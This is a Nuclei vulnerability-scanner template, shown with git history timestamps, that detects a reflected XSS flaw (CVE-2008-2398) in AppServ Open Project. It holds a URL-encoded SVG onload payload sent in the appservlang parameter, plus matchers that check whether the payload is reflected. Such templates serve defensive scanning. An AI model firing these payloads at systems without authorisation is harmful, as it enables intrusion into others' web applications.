nuclei-templates/cves/2008/CVE-2008-2398.yaml

26 lines
508 B
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2008-2398
2020-12-15 19:50:04 +00:00
info:
name: AppServ Open Project 2.5.10 and earlier XSS
author: unstabl3
severity: medium
requests:
- method: GET
path:
2020-12-25 15:04:57 +00:00
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
2020-12-16 05:36:39 +00:00
2020-12-15 19:50:04 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2020-12-25 15:04:57 +00:00
- "<svg/onload=confirm('xss')>"
2020-12-15 19:50:04 +00:00
part: body
2020-12-16 05:36:39 +00:00
- type: word
words:
- "text/html"
part: header